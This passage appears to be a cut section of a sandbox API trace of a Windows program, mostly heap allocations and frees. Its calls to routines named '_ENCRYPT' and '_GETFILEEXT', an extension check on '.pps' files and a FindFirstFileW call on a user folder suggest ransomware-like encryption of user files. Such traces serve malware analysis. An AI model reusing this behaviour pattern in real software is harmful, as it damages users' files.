lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0173.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0173.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0173.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0173.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0173.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0173.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0173.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0173.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0173.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0173.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0173.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0173.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0173.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0173.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0173.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0173.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0173.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0173.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0173.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0173.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0173.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0173.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0173.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0173.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0173.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0173.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0173.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0173.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0173.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0173.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0173.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0173.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0173.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0173.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0173.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0173.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0173.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0173.577] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0173.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0173.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0173.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0173.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0173.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0173.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0173.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0173.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0173.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0173.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0173.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0173.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.579] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0173.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0173.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0173.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0173.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0173.579] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0173.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0173.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0173.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0173.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0173.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0173.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0173.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0173.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0173.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0173.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0173.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0173.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0173.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0173.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0173.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0173.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0173.580] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0173.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0173.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0173.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0173.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0173.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0173.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0173.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0173.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0173.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0173.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0173.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0173.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0173.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.581] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0173.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0173.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0173.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0173.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba3d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0173.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0173.581] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0173.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0173.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0173.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0173.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0173.582] CloseHandle (hObject=0x120) returned 1 [0173.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0173.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0173.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0173.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0173.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0173.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0173.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0173.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0173.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0173.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0173.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0173.582] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0173.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0173.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0173.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0173.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0173.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0173.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0173.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0173.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0173.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0173.583] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0173.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0173.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0173.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0173.583] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0173.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0173.583] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0173.583] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0173.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0173.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.583] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0173.583] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0173.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0173.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0173.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0173.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0173.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0173.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0173.584] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0173.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0173.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0173.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0173.584] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.584] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.584] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 